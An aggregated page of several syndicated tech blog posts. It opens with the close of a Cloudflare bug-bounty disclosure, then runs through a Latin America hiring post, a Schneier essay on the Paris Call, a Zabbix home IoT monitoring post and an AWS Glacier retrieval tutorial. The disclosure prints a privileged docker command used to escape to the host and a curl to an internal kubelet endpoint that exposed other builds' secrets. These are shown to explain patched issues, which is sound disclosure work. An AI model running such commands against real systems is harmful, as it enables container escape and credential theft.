sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.

The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.

Bug 6: Pages on Kubernetes

After receipt of the above bugs,  we decided to change the architecture  of Pages. One of these changes was migration of the product from Azure to Kubernetes, and simplifying the workflow, so the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds are within Kubernetes Pods and are seeded with the minimum set of credentials needed.

As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to curl the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).

curl -v -k [http://10.124.200.1:10255/pods](http://10.124.200.1:10255/pods)

We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages’ customers.

In the previously reported issues we had robust logs that showed us that the attacks that were being performed had never been performed by anyone else. The logs related to inspecting Pods were not available to us, so we decided to notify all Cloudflare Pages customers that had ever had a build run on our Kubernetes-based infrastructure. After patching the issue and investigating which customers were impacted, we emailed impacted customers on February 3 to tell them that it’s possible someone other than the researcher had exploited this issue, because our logs couldn’t prove otherwise.

Takeaways

We are thankful for all the security research performed on our Pages product, and done so at such an incredible depth. CI/CD and build infrastructure security problems are notoriously hard to prevent. A bug bounty that incentivizes researchers to keep coming back is invaluable, and we appreciate working with researchers who were flexible enough to perform great research, and work with us as we re-architected the product for more robustness. An in-depth write-up of these issues is available from the Assetnote team on their website.

More than this, however, the work of all these researchers is one of the best ways to test the security architecture of any product. While it might seem counter-intuitive after a post listing out a number of bugs, all these diligent eyes on our products allow us to feel much more confident in the security architecture of Cloudflare Pages. We hope that our transparency, and our description of the work done on our security posture, enables you to feel more confident, too.

Finally: if you are a security researcher, we’d love to work with you to make our products more secure. Check out hackerone.com/cloudflare for more info!

Why I joined Cloudflare in Latin America

Post Syndicated from Carlos Torales original https://blog.cloudflare.com/why-i-joined-cloudflare-in-latin-america/

Why I joined Cloudflare in Latin America

This post is also available in Español, Português.

Why I joined Cloudflare in Latin America

I am excited to announce that I recently joined Cloudflare as Vice President and Managing Director for Latin America. As many of you reading this likely already know, Cloudflare is on a mission to help build a better Internet. And that’s a big part as to why I joined this team — to contribute to this in Latin America specifically and interconnect all across the world. Cloudflare has had a strong presence in Latin America for years. First investing in the region back in 2014, when it expanded its network into Latin America to be closest to the users here — to provide even faster and reliable connections without compromising security. Over the past couple of years, our reliance on the Internet has increased, and Latin America is the fourth largest region in terms of online users globally. You can see how this makes Cloudflare’s mission even more important and presents a significant opportunity in Latin America.

A little about me

Being in the IT industry for two decades, this has shown me the profound impact of technology on everyone’s lives. Working within technology for years and seeing the industry evolve, with other companies that have been part of fueling my desire to deliver impactful results, I have already seen the impact Cloudflare has had at a massive scale, including in Latin America. Our further commitment to what’s to come in the region excites me. Not only in the business world with digital transitions, but also in promoting a better Latin America through the power of a more secure, performant, and reliable Internet!

Prior to joining Cloudflare, I was director of the Small Business and Commercial Segments for Cisco Latin America, where I directed an international team, leading sales and the business development efforts by digitizing the operational processes, sales cycle, and go-to-market strategy to drive scale within the SMB market. During my career I also have had the privilege to manage Segments Sales (Enterprise, Public Sector), Product Sales Specialists Teams, and business unit organizations in Security, Collaboration, Data Center, and Enterprise Networking.

Why I joined Cloudflare in Latin America

Why Cloudflare

My personal mission has always been expanding into new markets, building new organizations, and developing talent to drive incremental growth to gain market share — and more importantly, to deliver value to customers. I actually started my career working for Lucent Technologies’ Bell Labs mostly building new products and helping propel innovation. That was the first time I learned the power of technology, and its impact not just in business but in transforming lives.

Today, we are living in a very digital world, where all companies, industries, and countries are being transformed by the power of technology. At Cloudflare, I see a great opportunity to make a big impact, and in supporting Latin American countries. By taking advantage of this digital transformation, organizations of all sizes in the region can become even more productive with the technologies that are now available for industries and businesses of all types! Again, Cloudflare’s mission, to help build a better Internet, is key to why I decided to join. It all circles back to this. The inspiration and energy behind this mission is something you see in the entire team here from the get go. I have certainly seen this reflected in the work Cloudflare has already done in Latin America, but there’s a lot more we’re looking forward to. We are in a unique position to deliver significant value to customers and to millions of people in Latin America and beyond.

Growth opportunities in Latin America

It’s often been said that Latin America has been slow to adopt digital models, compared to the United States, Europe, and some countries in Asia. The shift to the cloud has just begun. Businesses are starting to move from on-premise technologies to the cloud, and many organizations are leveraging a multi-cloud environment as the platform to help propel them.

Cloudflare is in an unparalleled position to help transform the way Latin American companies do business and make that shift. We have seen this, in helping power many organizations in the region already, from customers like El Universal, to financial services like Bidu, Bitso, and Naranja, as well as retailers like Facily, and Falabella. This includes thousands of other Latin American customers of all sizes and types. We are also in partnership with a number of organizations to extend our services even further in the region, through Alestra, Cipher, NeoSecure, SYNNEX, TIVIT, and more.

By providing security, enhancing the performance of business-critical applications, and eliminating the cost and complexity of managing individual hardware — there are no tradeoffs for organizations, with this all within Cloudflare’s global cloud infrastructure and services. To give a sense of impact in the region, on average we block nearly seven billion cyber attacks every single day in Latin America. That’s something we’re very proud of especially as we see these threats developing.

When it comes to speed and reliability, with Cloudflare’s direct connections to more service and cloud providers, our network can reach 95% of the world’s population within 50 milliseconds (the blink of an eye is 300-400 milliseconds!). Cloudflare’s network is one of the most interconnected and also the largest networks in the world — already spanning more than 270 cities globally and this includes about 40 in Latin America. Being closest in proximity to Latin American users and organizations enables even more speed and reliable connections not only within Latin America, but also in and out of the region to anywhere else in the world.

I am very much looking forward to making an impact first hand to even more customers, partners, and users in Latin America.

Through the power of technology and innovation, let’s accelerate Latin America’s digital transformation! Let’s contribute to having a faster, more secure, and more reliable Internet in the region. I know a better Internet can be key to transforming Latin America and igniting productivity.

If you are interested in partnering with us, or would like to explore how we can help ensure your organization’s Internet properties are secure, fast, and reliable — reach out to me, [email protected] anytime. Also, we are hiring, and I’m helping grow our team! If you are interested in embarking on an ambitious mission to help build a better Internet, check out our open roles.

Corporate Involvement in International Cybersecurity Treaties

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/05/corporate-involvement-in-international-cybersecurity-treaties.html

The Paris Call for Trust and Stability in Cyberspace is an initiative launched by French President Emmanuel Macron during the 2018 UNESCO’s Internet Governance Forum. It’s an attempt by the world’s governments to come together and create a set of international norms and standards for a reliable, trustworthy, safe, and secure Internet. It’s not an international treaty, but it does impose obligations on the signatories. It’s a major milestone for global Internet security and safety.

Corporate interests are all over this initiative, sponsoring and managing different parts of the process. As part of the Call, the French company Cigref and the Russian company Kaspersky chaired a working group on cybersecurity processes, along with French research center GEODE. Another working group on international norms was chaired by US company Microsoft and Finnish company F-Secure, along with a University of Florence research center. A third working group’s participant list includes more corporations than any other group.

As a result, this process has become very different than previous international negotiations. Instead of governments coming together to create standards, it is being drive by the very corporations that the new international regulatory climate is supposed to govern. This is wrong.

The companies making the tools and equipment being regulated shouldn’t be the ones negotiating the international regulatory climate, and their executives shouldn’t be named to key negotiation roles without appointment and confirmation. It’s an abdication of responsibility by the US government for something that is too important to be treated this cavalierly.

On the one hand, this is no surprise. The notions of trust and stability in cyberspace are about much more than international safety and security. They’re about market share and corporate profits. And corporations have long led policymakers in the fast-moving and highly technological battleground that is cyberspace.

The international Internet has always relied on what is known as a multistakeholder model, where those who show up and do the work can be more influential than those in charge of governments. The Internet Engineering Task Force, the group that agrees on the technical protocols that make the Internet work, is largely run by volunteer individuals. This worked best during the Internet’s era of benign neglect, where no one but the technologists cared. Today, it’s different. Corporate and government interests dominate, even if the individuals involved use the polite fiction of their own names and personal identities.

However, we are a far cry from decades past, where the Internet was something that governments didn’t understand and largely ignored. Today, the Internet is an essential infrastructure that underpins much of society, and its governance structure is something that nations care about deeply. Having for-profit tech companies run the Paris Call process on regulating tech is analogous to putting the defense contractors Northrop Grumman or Boeing in charge of the 1970s SALT nuclear agreements between the US and the Soviet Union.

This also isn’t the first time that US corporations have led what should be an international relations process regarding the Internet. Since he first gave a speech on the topic in 2017, Microsoft President Brad Smith has become almost synonymous with the term “Digital Geneva Convention.” It’s not just that corporations in the US and elsewhere are taking a lead on international diplomacy, they’re framing the debate down to the words and the concepts.

Why is this happening? Different countries have their own problems, but we can point to three that currently plague the US.

First and foremost, “cyber” still isn’t taken seriously by much of the government, specifically the State Department. It’s not real to the older military veterans, or to the even older politicians who confuse Facebook with TikTok and use the same password for everything. It’s not even a topic area for negotiations for the US Trade Representative. Nuclear disarmament is “real geopolitics,” while the Internet is still, even now, seen as vaguely magical, and something that can be “fixed” by having the nerds yank plugs out of a wall.

Second, the State Department was gutted during the Trump years. It lost many of the up-and-coming public servants who understood the way the world was changing. The work of previous diplomats to increase the visibility of the State Department’s cyber efforts was abandoned. There are few left on staff to do this work, and even fewer to decide if they’re any good. It’s hard to hire senior information security professionals in the best of circumstances; it’s why charlatans so easily flourish in the cybersecurity field. The built-up skill set of the people who poured their effort and time into this work during the Obama years is gone.

Third, there’s a power struggle at the heart of the US government involving cyber issues, between the White House, the Department of Homeland Security (represented by CISA), and the military (represented by US Cyber Command). Trying to create another cyber center of power within the State Department threatens those existing powers. It’s easier to leave it in the hands of private industry, which does not affect those government organizations’ budgets or turf.

We don’t want to go back to the era when only governments set technological standards. The governance model from the days of the telephone is another lesson in how not to do things. The International Telecommunications Union is an agency run out of the United Nations. It is moribund and ponderous precisely because it is run by national governments, with civil society and corporations largely alienated from the decision-making processes.

Today, the Internet is fundamental to global society. It’s part of everything. It affects national security and will be a theater in any future war. How individuals, corporations, and governments act in cyberspace is critical to our future. The Internet is critical infrastructure. It provides and controls access to healthcare, space, the military, water, energy, education, and nuclear weaponry. How it is regulated isn’t just something that will affect the future. It is the future.

Since the Paris Call was finalized in 2018, it has been signed by 81 countries — including the US in 2021 — 36 local governments and public authorities, 706 companies and private organizations, and 390 civil society groups. The Paris Call isn’t the first international agreement that puts companies on an equal signatory footing as governments. The Global Internet Forum to Combat Terrorism and the Christchurch Call to eliminate extremist content online do the same thing. But the Paris Call is different. It’s bigger. It’s more important. It’s something that should be the purview of governments and not a vehicle for corporate power and profit.

When something as important as the Paris Call comes along again, perhaps in UN negotiations for a cybercrime treaty, we call for actual State Department officials with technical expertise to be sitting at the table with the interests of the entire US in their pocket…not people with equity shares to protect.

This essay was written with Tarah Wheeler, and previously published on The Cipher Brief.

Marrying Zabbix and Cozify IoT hub

Post Syndicated from Janne Pikkarainen original https://blog.zabbix.com/marrying-zabbix-and-cozify-iot-hub/20377/

For those of you who know me, this should not come as a surprise: I absolutely love Zabbix. It gives me the ultimate freedom to monitor whatever I need to monitor and is flexible enough to be able to monitor absolutely everything you can imagine. It’s free, it’s open-source, and scales to whatever needs you might have.

What does a monitoring nerd who is a technical lead for monitoring in a global cyber security company do during his downtime? That’s a silly question, mind you. Of course, he monitors his home with a home Zabbix instance.

Temperatures at our home, measured by Cozify, data collected by Zabbix

Hello, Cozify

We have had a Cozify home automation system in our household since 2017. It is a nice central hub that supports IoT devices from a plethora of vendors and a vast selection of device categories, ranging from Philips Hue lights to motion sensors to cameras to fire alarm systems. You can then configure actions on some other device based on actions on one device: for example, turn on a light if a motion sensor detects movement.

Cozify is a very capable device, but where it definitely lacks is monitoring and analytics about what’s going on underneath.

As a monitoring addict, that is something I simply cannot stand.

Let’s build a bridge between Cozify and Zabbix

Someone has built an unofficial Python library for communicating with Cozify API. The library is a bit limited in functionality, the most limiting factor being that it only supports read-only operations. However, for my monitoring purposes, that does not matter, as I anyway need to read data.

For my initial testing purposes, I wrote a couple of small Python scripts to gather temperature and humidity data from our temperature sensors, and one script to monitor the general availability of the different IoT devices we have around. The scripts are run from cron every five minutes, and the results are written to text files that Zabbix reads. Zabbix has master items for temperature, humidity and reachability files, and using the dependent items, it can populate the data for all the 40+ data points I have now using just three polls.

Benefits of such project

Other than the cool geek factor, what’s the benefit of monitoring your home IoT hub? There’s plenty!

  • I get to learn all kinds of patterns about our home status: temperatures, reliability of individual devices, and the amount of time any device has been on/off
  • I get notified immediately if a critical device, like a smoke alarm, does not function properly
  • I get notified if the battery level on any battery-operated IoT device is getting low and can react before a device dies
  • I can follow how quickly the battery is draining on some device
Still for me to do

The current implementation is way too manual. It would be possible to utilize Zabbix low-level discovery to parse the JSON received from Cozify, but if I just dump everything from it, it contains all the possible device categories with different parameters: Philips Hue lights do report everything from their current brightness/color settings to if their firmware has been upgraded, and then the temperature or motion sensors do report back completely different set of data. That makes creating the monitored items automatically in a sane way a bit difficult.

So, I need to think a bit and figure out how to make my Cozify template more automatic.

I also need to set up a home Grafana instance speaking to Zabbix. Zabbix is excellent at collecting the monitoring data and sending out alerts, but Grafana is the perfect partner for Zabbix to do all the analytics and eye candy.

I have 20+ years of sysadmin/monitoring experience. Forcepoint has been my landing spot since 2014, and there I have been a monitoring technical lead since 2016. Everything Linux/FreeBSD, Zabbix, Grafana and open source in general is close to my heart. So close, in fact, that monitoring is also my hobby and I do weird experiments with Zabbix & Grafana at home. — Janne Pikkarainen

The post Marrying Zabbix and Cozify IoT hub appeared first on Zabbix Blog.

Orchestrating Amazon S3 Glacier Deep Archive object retrieval using AWS Step Functions

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/orchestrating-amazon-s3-glacier-deep-archive-object-retrieval-using-aws-step-functions/

This blog was written by Monica Cortes Sack, Solutions Architect, Oskar Neumann, Partner Solutions Architect, and Dhiraj Mahapatro, Principal Specialist SA, Serverless.

AWS Step Functions now support over 220 services and over 10,000 AWS API actions. This enables you to use the AWS SDK integration directly instead of writing an AWS Lambda function as a proxy.

One such service integration is with Amazon S3. Currently, you write scripts using AWS CLI S3 commands to achieve automation around running S3 tasks. For example, S3 integrates with AWS Transfer Family, builds a custom security check, takes action on S3 buckets on S3 object creations, or orchestrates a workflow around S3 Glacier Deep Archive object retrieval. These script executions do not provide an execution history or an easy way to validate the behavior.

Step Functions’ AWS SDK integration with S3 declaratively creates serverless workflows around S3 tasks without relying on those scripts. You can validate the execution history and behavior of a Step Functions workflow.

This blog highlights one of the S3 use cases. It shows how to orchestrate workflows around S3 Glacier Deep Archive object retrieval, cost estimation, and interaction with the requester using Step Functions. The demo application provides additional details on the entire architecture.

S3 Glacier Deep Archive is a storage class in S3 used for data that is rarely accessed. The service provides durable and secure long-term storage, trading immediate access for cost-effectiveness. You must restore archived objects before they are downloadable. It supports two options for object retrieval:

  1. Standard – Access objects within 12 hours of the start of the restoration process.
  2. Bulk – Access objects within 48 hours of the start of the restoration process.

Business use case

Consider a research institute that stores backups on S3 Glacier Deep Archive. The backups are maintained in S3 Glacier Deep Archive for redundancy. The institute has multiple researchers with one central IT team. When a researcher requests an object from S3 Glacier Deep Archive, the central IT team retrieves it and charges the corresponding research group for retrieval and data transfer costs.

Researchers are the end users and do not operate in the AWS Cloud. They run computing clusters on-premises and depend on the central IT team to provide them with the restored archive. A member of the research team requesting an object retrieval provides the following information to the central IT team:

  1. Object key to be restored.
  2. The number of days the researcher needs the object accessible for download.
  3. Researcher’s email address.
  4. Retrieve within 12 or 48 hours SLA. This determines whether “Standard” or “Bulk” retrieval respectively.

The following overall architecture explains the setup on AWS and the interaction between a researcher and the central IT team’s architecture.

Architecture overview

Architecture diagram

Architecture diagram

  1. The researcher uses a front-end application to request object retrieval from S3 Glacier Deep Archive.
  2. Amazon API Gateway synchronously invokes AWS Step Functions Express Workflow.
  3. Step Functions initiates RestoreObject from S3 Glacier Deep Archive.
  4. Step Functions stores the metadata of this retrieval in an Amazon DynamoDB table.
  5. Step Functions uses Amazon SES to email the researcher about archive retrieval initiation.
  6. Upon completion, S3 sends the RestoreComplete event to Amazon EventBridge.
  7. EventBridge rule triggers another Step Functions for post-processing after the restore is complete.
  8. A Lambda function inside the Step Functions calculates the estimated cost (retrieval and data transfer out) and updates existing metadata in the DynamoDB table.
  9. Sync data from DynamoDB table using Amazon Athena Federated Queries to generate reports dashboard in Amazon QuickSight.
  10. Step Functions uses SES to email the researcher with cost details.
  11. Once the researcher receives an email, the researcher uses the front-end application to call the /download API endpoint.
  12. API Gateway invokes a Lambda function that generates a pre-signed S3 URL of the retrieved object and returns it in the response.

Setup

  1. To run the sample application, you must install CDK v2, Node.js, and npm.
  2. To clone the repository, run:
    git clone https://github.com/aws-samples/aws-stepfunctions-examples.git
    cd cdk/app-glacier-deep-archive-retrieval
  3. To deploy the application, run:
    cdk deploy --all

Identifying workflow components

Starting the restore object workflow

The first component is accepting the researcher’s request to start the archive retrieval process. The sample application created from the demo provides a basic front-end app that shows the files from an S3 bucket that has objects stored in S3 Glacier Deep Archive. The researcher retrieves file requests from the front-end application reached by the sample application’s Amazon CloudFront URL.

Glacier Deep Archive Retrieval menu

Glacier Deep Archive Retrieval menu

The front-end app asks the researcher for an email address, the number of days the researcher wants the object to be available for download, and their ETA on retrieval speed. Based on the retrieval speed, the researcher accepts either Standard or Bulk object retrieval. To test this, put objects in the data bucket under the S3 Glacier Deep Archive storage class and use the front-end application to retrieve them.

Item retrieval prompt

Item retrieval prompt

The researcher then chooses the Retrieve file. This action invokes an API endpoint provided by API Gateway. The API Gateway endpoint synchronously invokes a Step Functions Express Workflow. This validates the restore object request, gets the object metadata, and starts to restore the object from S3 Glacier Deep Archive.

The state machine stores the metadata of the restore object AWS SDK call in a DynamoDB table for later use. You can use this metadata to build a dashboard in Amazon QuickSight for reporting and administration purposes. Finally, the state machine uses Amazon SES to email the researcher, notifying them about the restore object initiation process:

Restore object initiated

Restore object initiated

The following state machine shows the workflow:

Workflow diagram

Workflow diagram

The ability to use S3 APIs declaratively using AWS SDK from Step Functions makes it convenient to integrate with S3. This approach avoids writing a Lambda function to wrap the SDK calls. The following portion of the state machine definition shows the usage of S3 HeadObject and RestoreObject APIs:

"Get Object Metadata": {
    "Next": "Initiate Restore Object from Deep Archive",
    "Catch": [{
        "ErrorEquals": ["States.ALL"],
        "Next": "Bad Request"
    }],
    "Type": "Task",
    "ResultPath": "$.result.metadata",
    "Resource": "arn:aws:states:::aws-sdk:s3:headObject",
    "Parameters": {
        "Bucket": "glacierretrievalapp-databucket-abc123",
        "Key.$": "$.fileKey"
    }
}, 
"Initiate Restore Object from Deep Archive": {
    "Next": "Update restore operation metadata",
    "Type": "Task",
    "ResultPath": null,
    "Resource": "arn:aws:states:::aws-sdk:s3:restoreObject",
    "Parameters": {
        "Bucket": "glacierretrievalapp-databucket-abc123",
        "Key.$": "$.fileKey",
        "RestoreRequest": {
            "Days.$": "$.requestedForDays"
        }
    }
}

You can extend the previous workflow and build your own Step Functions workflows to orchestrate other S3 related workflows.

Processing after object restoration completion

S3 RestoreObject is a long-running process for S3 Glacier Deep Archive objects. S3 emits a RestoreCompleted event notification on the object restore completion to EventBridge. You set up an EventBridge rule to trigger another Step Functions workflow as a target for this event. This workflow takes care of the object restoration post-processing.

cfnDataBucket.addPropertyOverride('NotificationConfiguration.EventBridgeConfiguration.EventBridgeEnabled', true);

An EventBridge rule triggers the following Step Functions workflow and passes the event payload as an input to the Step Functions execution:

new aws_events.Rule(this, 'invoke-post-processing-rule', {
  eventPattern: {
    source: ["aws.s3"],
    detailType: [
      "Object Restore Completed"
    ],
    detail: {
      bucket: {
        name: [props.dataBucket.bucketName]
      }
    }
  },
  targets: [new aws_events_targets.SfnStateMachine(this.stateMachine, {
    input: aws_events.RuleTargetInput.fromObject({
      's3Event': aws_events.EventField.fromPath('$')
    })
  })]
});

The Step Functions workflow gets object metadata from the DynamoDB table and then invokes a Lambda function to calculate the estimated cost. The Lambda function calculates the estimated retrieval and the data transfer costs using the contentLength of the retrieved object and the Price List API for the unit cost. The workflow then updates the calculated cost in the DynamoDB table.

The retrieval cost and the data transfer out cost are proportional to the size of the retrieved object. The Step Functions workflow also invokes a Lambda function to create the download API URL for object retrieval. Finally, it emails the researcher with the estimated cost and the download URL as a restoration completion notification.

Workflow studio diagram

Workflow studio diagram

The email notification to the researcher looks like:

Email example

Email example

Downloading the restored object

Once the object restoration is complete, the researcher can download the object from the front-end application.

Front end retrieval menu

Front end retrieval menu

The researcher chooses the Download action, which invokes another API Gateway endpoint. The endpoint integrates with a Lambda function as a backend that creates a pre-signed S3 URL sent as a response to the browser.

Administering object restoration usage

This architecture also provides a view for the central IT team to understand object restoration usage. You achieve this by creating reports and dashboards from the metadata stored in DynamoDB.

The sample application uses Amazon Athena Federated Queries and Amazon Athena DynamoDB Connector to generate a reports dashboard in Amazon QuickSight. You can also use Step Functions AWS SDK integration with Amazon Athena and visualize the workflows in the Athena console.

The following QuickSight visualization shows the count of restored S3 Glacier Deep Archive objects by their contentType:

QuickSite visualization

QuickSight visualization

Considerations

With the preceding approach, you should consider that:

  1. You must start the object retrieval in the same Region as the Region of the archived object.
  2. S3 Glacier Deep Archive only supports standard and bulk retrievals.
  3. You must enable the “Object Restore Completed” event notification on the S3 bucket with the S3 Glacier Deep Archive object.
  4. The researcher’s email must be verified in SES.
  5. Use a Lambda function for the Price List GetProducts API as the service endpoints are available in specific Regions.

Cleanup

To clean up the infrastructure used in this sample application, run:

cdk destroy --all

Conclusion

Step Functions’ AWS SDK integration opens up different opportunities to orchestrate a workflow. Step Functions provides native support for retries and error handling, which offloads the heavy lifting of handling them manually in scripts.

This blog shows one example use case with S3 Glacier Deep Archive. With AWS SDK integration in Step Functions, you can build any workflow orchestration using S3 or S3 control APIs. For example, a workflow to enforce AWS Key Management Service encryption based on an S3 event, or create static website hosting on-demand in a few steps.

With different S3 API calls available in Step Functions’ Workflow Studio, you can declaratively build a Step Functions workflow instead of imperatively calling each S3 API from a shell script or command line. Refer to the demo application for more details.

For more serverless learning resources, visit Serverless Land.

The collective thoughts of the interwebz